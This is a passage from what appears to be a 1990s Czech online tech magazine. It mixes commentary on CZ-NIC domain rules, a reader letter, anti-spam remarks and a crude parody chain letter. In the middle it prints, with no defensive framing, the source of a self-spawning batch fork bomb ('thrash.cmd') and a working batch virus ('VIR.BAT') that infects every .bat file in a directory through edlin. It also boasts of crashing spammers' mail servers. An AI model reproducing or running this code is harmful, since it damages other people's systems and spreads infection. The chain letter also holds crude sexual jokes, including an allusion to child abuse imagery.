i bezduvodnou - opet striktne podle pravidel), povede to mozna ke zruseni one domeny
tez. To je ovsem perfektni. A korunu tomu celemu nasazuje posledni podminka - obzvlaste
pro firmy, ktere jsou na webu zavisle. Pokud je tedy podle CZ-NIC pravdepodobne, ze vase
firma, zivici se obchodovanim na webu zanikne, zrusi ji proste domenove jmeno a firma
skutecne zanikne - i takhle jdou ona pravidla totiz interpretovat. To uz i nase zakony
jsou mene zneuzitelne. Pokracujme vsak dale:
5. Pravidla pro tvorbu Domenoveho jmena
5.1. Nejsou povolena Domenova jmena skladajici se ze dvou pismen odpovidajici
ISO kodum jednotlivych statu.
5.2. Veskere domeny nejvyssiho stupne nesmeji byt uzivany jako domeny druheho
stupne (napriklad com.cz nebo uk.cz).
5.3. Veskere nove pozadavky na domeny musi vyhovovat normam RFCs 1034, 1035,
1122, 1123 a jakymkoliv je nahrazujicim normam.
Bod 5.3 je v poradku, ale proc proboha body 5.2 a 5.1? Proc by nemohla existovat
treba domena com.cz (nota bene kdyz existuje i cz.com). A proc tahle pravidla
CZ-NIC vytvoril, kdyz je uz domenou cd.cz (prismena cd pouziva Kongo) stejne porusil?
Ze by nekdo porusovat mohl a jiny se musel prizpusobit? To je prece vyborne, nemyslite?
by Zbynek Pospichal
by Radim Kolar
===thrash.cmd===
@echo off
:again
if exist c:\kill.flg exit
start thrash.cmd
goto again
================
by Radim Kolar
This virus requires edlin
====VIR.BAT====
@echo off
goto _@b
1,?s_@.bak
yq
y
#t_@.bak
+17,#d
-17,#,1m
e
:_@b
if exist %0 copy/b %0 _@.bak >nul
if exist %0.bat copy/b %0.bat _@.bak >nul
if not exist _@.bak goto _@a
for %%f in (*.bat) do edlin %%f <_@.bak >nul
del *.bak
:_@a
@echo on
==================
by Radim KolarAnketa NetMagu - Jaky OS pouzivate ?
Objevil jsem tam clanek, presneji receno jen jeden odstavec (str.12),
ktery psal Pavel Baudis reditel (hezky titul. 2All: bud'te tak laskavi
a neoslovujte mne v mailech pane redaktore - porad si totiz myslim, ze
pisete nekomu jinemu. Cesi a Rakusaci maji vubec nejak moc radi ruzne tituly.
Napr. v USA si na tituly vubec nehrajou.) zname ceske antivirove firmy (jmeno vypusteno kvuli tomu, abych jim nedelal
reklamu) o bezpecnosti na Internetu. Nejprve se dozvidame stokrat omlete veci jako,
ze na inernetu jsou k dispozici sbirky viru vcetne zdrojaku. Dale poklada
hackerske skupiny za kriminalni zivly, zjevne si je tedy s nekym plete. Zajimalo
by mne, zda povazuje autory sendmailu, linuxu, THE FILE, C/ a ostatnich produktu
za kriminalni zivly. Timto mne urazi. Ja o nem taky nepisi, ze sam pise viry,
aby mel kseft - to je uplne ten samy druh pomluvy!
by Zbynek Pospichal
Ctenari nam pisi...
Vazeny sefredaktore, na Mobilu jsem narazil na odkaz na Vas magazin (47/97), precetl si ho a rozhodl se napsat Vam nekolik postrehu. Nepouzivani frames a diakritiky je podle me velmi neohleduplne. Jake procento lidi cte NetMag z tak pravekych veci jako Lynx? Z Vase doporuceni browseru zcela jasne vyplyva, ze i Vy trpite syndromem nemam-rad-Microsoft-a-nadavam-na-nej-co-muzu. Ale k tomu pozdeji. S tou dalnici mate pravdu. I ja sam jsem na ni jel 180 km/h pomerne bez problemu a vic jsem nezkousel. M$IE 4.0 JE!! nejlepsi soucasny browser a Netscape s Navigatorem zaspal. Vase vytky sice beru, ale podle me jsou minoritni a nesnizuji kvalitu MSIE (M$IE, pokud chcete, ale je to paranoidni). Dle mych zkusenosti je rychlejsi nez nejaky Netscapy atp. Pozor - na modemu, pevnou linku nemam. K rychlosti - co si koupit nejakou RAMku, dneska uz je temer za pusu. Ano, kanaly jsou na modemu k nicemu, na pevne lince ne!! BTW: Windows95 se mi velmi libi a rad je pouzivam. Nehlede k tomu, ze neexistuje rozumna alternativa. Ne, OS/2 Warp opravdu ne. Dal uz s Vami souhlasim: Computerworld je opravdu absulutne k nicemu a je to zcela vyhozenych 12 Kc. Taktez VoiceWin, tentokrat za litr. Omlouvam se za neznalost, ale co je BFU? B-? Fuckin' User??? Jinak NetMag celkem ujde. S pozdravem Radek Miskela
Poslete 10 mailu a zazijete skvely sex!
Cizi BFU mi davaji opravdu zabrat (svoje mam velmi dobre proskolene). Vyrabi velmi aktivne totiz ruzne Internet viry. Nejvice mne pobavila skutecnost, ze jsem zahledl prilepeny papirek na monitoru s napisem JOIN THE CREW!.
Dneska tu mame dalsi typ internet viru a to lavinovity dopis. Takovedle veci maji BFU radi a opravdu jej 10ti zajemcum rychle poslaji. Na druhou stranu byl tento dopis ve formatu .RTF - posilalo ho tedy uz nejake poucene BFUcko, ktere vedelo, ze v .RTF nemohou byt makroviry.
Nezapomente, ze BUDE HUR. Firma, jejiz jmeno nechci jiz nikdy ani vyslovit dostala na svoji mailbombu priblizne 100 objednavek. Protoze se cesti spameri zacinaji objevovat ve stale vetsi mire, pritvrdil jsem v anti-spam opatrenich. Zakoupil jsem si licenci na Bind Deluxe a spolu s antispam patchema do qmailu blokuji vsechny spamery ihned po obdrzeni jejich spamu - zadne bububu uz na ne nedelam, dle mych zkusenosti slibi cokoliv a za mesic tu mam spam zase. Pro softwarove piraty plati to same, take jsem zkousel jich nekolik presvedcit po dobrem, aby s touto cinosti prestali a uspesnost byla 0%. Chybami se clovek uci.
Maily jim to vraci s hlaskou Spam blocked - see http://aaaaa/antispamlist.html for more infos. Nasazeni Bindu Deluxe je sice porusovanim RFC, ale zase ne tak velkym. Pokud spamer pouziva Microsoft Exchange, tak mu ho Bind Deluxe zacykli velmi dokonale. Mimochodem Sendmail deluxe umi naprosto nadherne schazovat tento Microsofti vymysl, dosahuje tohoto efektu tim, ze se tvari jako M$ sendmail, ovsem odpovedi na M$ rozsirujici SMTP prikazy posila v takovem tvaru, ze se protistrana nestaci divit. Sendmail deluxe zadne RFC neporusuje, ale je 12x drazsi nez Bind Deluxe.
ZAZIJETE SKVELY SEX do ctyr dnu od obdrzeni tohoto dopisu, pokud ho
ovsem poslete dal. Protoze kopie tohoto dopisu museji putovat neustale
po svete, musite Vy udelat deset kopii a poslat je pratelum. Toto neni
vtip. Neposilejte penize. Poslete jenom kopie dopisu lidem o nichz si
myslite, ze TO potrebuji do 96 hodin.
Priklady:
Pote co odeslal tento dopis, zachytil penis jednoho dustojnika
na kontrolu spenatu z Montany stroj na dojeni krav a on tak zazil
nejdelsi serii orgasmu sveho zivota.
John Elliot si chtel sehnat prostitutku, ale protoze prerusil
retez chytila ho pri tom policie. Navic pri nasledne prohlidce jeho domu
byly nalezeny casopisy s obrazky malych chlapcu, ktere ukazoval
sousedum.
Na predmesti Parize byly trenyrky Dona Loraye roztrzeny
neuspokojenou erekci 51 dni pote, co zapomnel odeslat dopis. Na druhou
stranu tato nehoda byla vyvazeny tim, ze mu pred tim automat na
prezervativy vydal tri kondomy misto jednoho (zrejme cena utechy).
Herbert Pudstrom dostal dopis v roce 1953. Pozadal svoji
sekretarku, aby udelala deset kopii a rozeslala je. Za nekolik dni ji
potkal ve vykricene ctvrti, kde si vydelavala mnohem vic, nez kolik ji
kdy za praci zaplatil.
General George Patton si pote co odeslal dopis myslel, ze vidi
na zemi ctvrtdolar. Pote co se shybl dolu prosla kolem krasna zena v
minisukni a on tak mel skvely vyhled.
Heywood Daddit, nezamestnany skrtic kurat, dostal dopis a
zapomnel ho do 96 hodin odeslat. Jeho manzelka dalsi den odesla s jeho
pritelem na kuzelky a nikdy vice se uz nevratila. On pozdeji dopis nasel
a rozeslal deset kopii. O par dni pozdeji si nalezl novou manzelku a
zjistil, ze se jeho stara manzelka, prestoze si myslel, jak je skvela,
chovala pri milovani jako mrtvy losos.
Alan Fairchild dostal dopis , neuveril mu a vyhodil ho. O devet
dni pozdeji si vylil do rozkroku horkou kavu.
Vyhodnoceni minule otazky tydne
Ano (43)
49% XXXXXXXXXXXXXXXXXXXXXXXXX
Ne (44)
50% XXXXXXXXXXXXXXXXXXXXXXXXX
Celkem: 87 platnych hlasu.
A samozrejme hned zase otazka nova